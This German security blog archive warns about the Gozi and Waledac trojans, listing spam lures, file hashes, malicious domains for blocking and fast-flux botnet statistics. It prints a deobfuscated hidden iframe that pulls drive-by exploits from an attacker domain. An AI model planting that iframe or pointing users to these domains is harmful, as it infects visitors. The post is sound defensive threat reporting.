Tag Archive for 'trojaner'

Erneut gefälschte news.ch E-Mails im Umlauf

Seit heute Morgen früh verbreitet sich wieder einmal mehr der Trojaner Gozi (aka Infostealer) über eine Spam-Welle mit gefälschtem Absender von news.ch:

Von: “Swiss Krise” bildstrecke@news.ch
Betreff: UBS FINANZKRISE: Die UBS kampft mit einem angeschlagenen Image.

Gegen die Krise

Radikaler Umbau bei der UBS
Die Konzernspitze der UBS will mit einem radikalen Umbau der Grossbank endlich den ersehnten Boden unter den Fussen erreichen:
Die UBS soll sich von der Vision eines globalen Finanzmulti verabschieden und zu ihren Wurzeln zuruckfinden – zuruck zum Heimmarkt Schweiz.

Bis ins Einzelne>>

Mit den herzlichen Grüßen, Boris Flint.

E-Mail Text, der Betreff sowie die Absender sind jeweils die selben wie bei der letzte Spam-Welle vom 30. Januar 2009 (Siehe Post “Gefälschte E-Mails mit news.ch als Absender im Umlauf). Die im Spam-Mail angegebenen Webseiten lauten jedoch auch diesmal wieder anders:

  • videopupdete.com
  • setupplayer10.com
  • lookvideonew.com
  • floadnewplayer.com
  • adbeplayer.com
  • Auf den oben genannten Webseiten wird wie gewohnt der Trojaner Gozi zum download angeboten:

    Filename: Adobe_Player10_3_.exe
    File size: 38912 bytes
    MD5…: 23ac437f849d7b40ca9ce7e383136899
    SHA1..: f25f5e7208f44d6379b750a16d1acbb84d702932
    Erkennungsrate: 4/39 (10.26%)

    Wie immer gilt: Klicken Sie nicht auf den im Spam-Mail angegebenen Link und führen Sie auf keinen Fall das auf der Webseite angebotene EXE-File aus (Adobe_Player10_3_.exe).

    Waledac: Ein kleiner Ãœberblick

    Bereits seit Ende des letzten Jahres tummelt sich ein Trojaner Namens Waledac im Internet herum. Da der Trojaner jedoch nicht explizit auf Schweizer Internet User abzielt, habe ich bisher auch keinen Blog-Post dazu geschrieben. Aus aktuellem Anlass (Amtsantritt von Barack Obama) möchte ich hier jedoch trozdem kurz etwas über den Trojaner schreiben.

    Der Trojaner verbreitete sich bereits über mehrere Spam-Wellen:

    • Greeting Cards
    • Merry Christmas Card
    • Happy new year Card
    • Barack Obama has refused to be a president

    Die Spam-Mails sind/waren jeweils in englisch verfasst und gingen, wenn auch nur vereinzelt, auch an Schweizer E-Mail Empfänger. In der neusten Spam-Welle, welche seit vergangenem Sonntag 18. Januar 2009 unterwegs ist, behauptet das Spam-Mail, dass Barack Obama nicht als President der Vereinigten Staaten antreten werde. Die Spam-Mails enthalten jeweils einen Link auf eine Webseite, welche schlussendlich den Trojaner verbreitet.

    Beispiel aktuelle Spam-Welle

    waledac_obama

    Klickt der Besucher auf der Webseite auf einen Link, liefert diese dem Besucher ein EXE-File, in welchem sich der Trojaner Waledac befindet. Interessant ist jedoch folgender JavaScript Code, welcher sich auf sämtlichen Webseiten, welche den Trojaner verbreiten, befindet:

    malicious_js_obama

    Der Quellcode der Webseite verweist auf eine vermeidliche JavaScript-Datei, welche angeblich zu Google Analytics gehört . Schaut man sich jedoch den JavaScript Code der Datei google-analysis.js an, kommt ein obfuscated JavaScript Code zum Vorschein:

    obfuscated_js_obama

    Deobfuskiert man den JavaScript Code, kommt ein Iframe zur Domain googl-status.com (74.200.80.10) zum Vorschein:

    <\iframe src="http://googl-status.com/jobs/direct.php?eb0h" style="display:none">

    Schauen wir uns den Quellcode von googl-status.com an, erkennen wir ziemlich rasch, dass es sich dabei um Drive-By exploits handelt.

    Kurz gesagt: Die von Waledac für die verbreitung des Trojaners genutzen Webseiten versuchen dem Besucher gleich auf zwei Arten den Trojaner unter zu jubeln: Einmal als normaler Datei download und einmal per Drive-By infection. Somit reicht das blosse anschauen der Webseite, um mit dem Trojaner infiziert zu werden. An dieser Stelle gilt es auch noch zu erwähnen, dass sich der Name des angebotenen EXE-Files bei jedem Besuch ändert:

    • readme.exe
    • statement.exe
    • barackblog.exe
    • doc.exe
    • obamaspeech.exe
    • blog.exe
    • barack.exe
    • usa.exe
    • baracknews.exe
    • pdf.exe
    • news.exe
    • obamasblog.exe
    • president.exe
    • obamanews.exe

    Die Erkennungsrate des Trojaners ist mittlerweile sehr gut:

    Filename: barackblog.exe
    File size: 395776 bytes
    MD5…: e32bd572f87625db9df7359af571c06e
    SHA1..: 6e5f468b773a06f2e94fa096564d6fbdd6fff14c
    Erkennungsrate: 23/39 (58.97%)

    Zur Zeit sind mir 74 Domains bekannt, welche den Trojaner verbreiten und welche es zu blockieren gilt:

    yourdecember.com
    directchristmasgift.com
    livechristmasgift.com
    cheapdecember.com
    justchristmasgift.com
    bestchristmascard.com
    blackchristmascard.com
    christmaslightsnow.com
    decemberchristmas.com
    freechristmassite.com
    freechristmasworld.com
    freedecember.com
    funnychristmasguide.com
    holidayxmas.com
    itsfatherchristmas.com
    livechristmascard.com
    superchristmasday.com
    superchristmaslights.com
    whitewhitechristmas.com
    yourchristmaslights.com
    newyearcardonline.com
    newyearcardcompany.com
    bestyearcard.com
    youryearcard.com
    newmediayearguide.com
    superyearcard.com
    cardnewyear.com
    mirabellaclub.com
    mirabellaonline.com
    newlifeyearsite.com
    newyearcardfree.com
    newyearcardservice.com
    themirabelladirect.com
    themirabellahome.com
    smartcardgreeting.com
    yourregards.com
    yourmirabelladirect.com
    worldgreetingcard.com
    topgreetingsite.com
    themirabellaguide.com
    mirabellanews.com
    mirabellamotors.com
    lifegreetingcard.com
    greetingsupersite.com
    greetingguide.com
    greetingcardgarb.com
    greetingcardcalendar.com
    greatmirabellasite.com
    eternalgreetingcard.com
    bestmirabella.com
    greatobamaguide.com
    superobamaonline.com
    superobamadirect.com
    greatobamaonline.com
    wapcitynews.com
    bestbarack.com
    bestbaracksite.com
    bestobamadirect.com
    expowale.com
    greatbarackguide.com
    jobarack.com
    thebaracksite.com
    topwale.com
    waledirekt.com
    waleonline.com
    waleprojekt.com
    goodnewsdigital.com
    goodnewsreview.com
    linkworldnews.com
    reportradio.com
    spacemynews.com
    worldnewsdot.com
    worldnewseye.com
    worldtracknews.com

    Die Domains werden auf dem Waledac Botnet gehostet (FastFlux). Ein paar der Domains sind bereits offline.

    Ist ein Rechner einmal infiziert, kommuniziert er über HTTP mit andern infizierten Rechner (eine Art HTTP2p, siehe Shadowserver.org). Somit gibt es keinen eigentlichen fixen Command & Control Server (C&C), auf welchen man den Zugriff unterbinden könnte. Nach einer gewissen Zeit werden die infizierten Rechner dann als FastFlux bots missbraucht, um die oben genannten Domains zu hosten.

    Das Grundsätzliche Verhalten des Trojaner erinnert uns an den Storm Worm, welcher ebenfalls FastFlux sowie eine P2P-Technik verwendet hatte.

    Waledac FastFlux Botnet

    Schauen wir uns das Waledac FastFlux botnet etwas genauer an:

    Die Waledac Domains werden Single Flux mit einer Time to live (TLL) von 0 Sekunden gehostet:

    dig bestbarack.com

    ;; ANSWER SECTION:
    bestbarack.com. 0 IN A 60.164.102.218

    Im Zuge des abuse.ch FastFlux Tracker beobachte ich nun schon seit Ende des letzten Jahres das FastFlux Botnet, welches die Waledac Domains hosten. Das Tracking System hat bereits über 11’828 infizierte Rechner gefunden, welche als FastFlux Bots missbraucht werden. Somit schafft es das Waledac FastFlux botnet innert kurzer Zeit (knapp einen Monat) auf Platz drei der zehn grössten FastFlux Botnetze:

    biggest_botnets09jan

    Quelle: dnsbl.abuse.ch/statistic/fastflux.php

    Was nicht verwundert ist die geografische Verteilung der Infizierten Rechner:

    waledac_botnet_location

    Rund 25% der Bots stammen aus den USA. Die Schweiz ist mit 44 Infizierten Rechner vertreten, welche sich zum grössten Teil im Netz der Cablecom befinden:

    cablecom_waledac

    Quelle: dnsbl.abuse.ch/fastfluxtracker.php?asn=8404. Die Liste enthält auch IP, welche anderen Botnetze angehören.

    Was es zu beachten gibt, ist, dass viele IP Adressen dynamisch vergeben werden und somit die Zahl der tatsächlich infizierten Rechner unbekannt ist.

    Fazit

    Der Trojaner Waledac ist eine globale Bedrohung, welche jedoch vor allem in der USA auf Opfer stösst und die Schweiz bis an hin nur leicht gestreift hat. Trotzdem empfiehlt es sich, die oben genannten Waledac Domains an den Unternehmens-Gateways bzw. Proxy-Servern zu blockieren.

    Weitere Informationen zu Waledec gibt es unter folgenden Links (Englisch):




    economics-recluse
    Scene
    Urgent!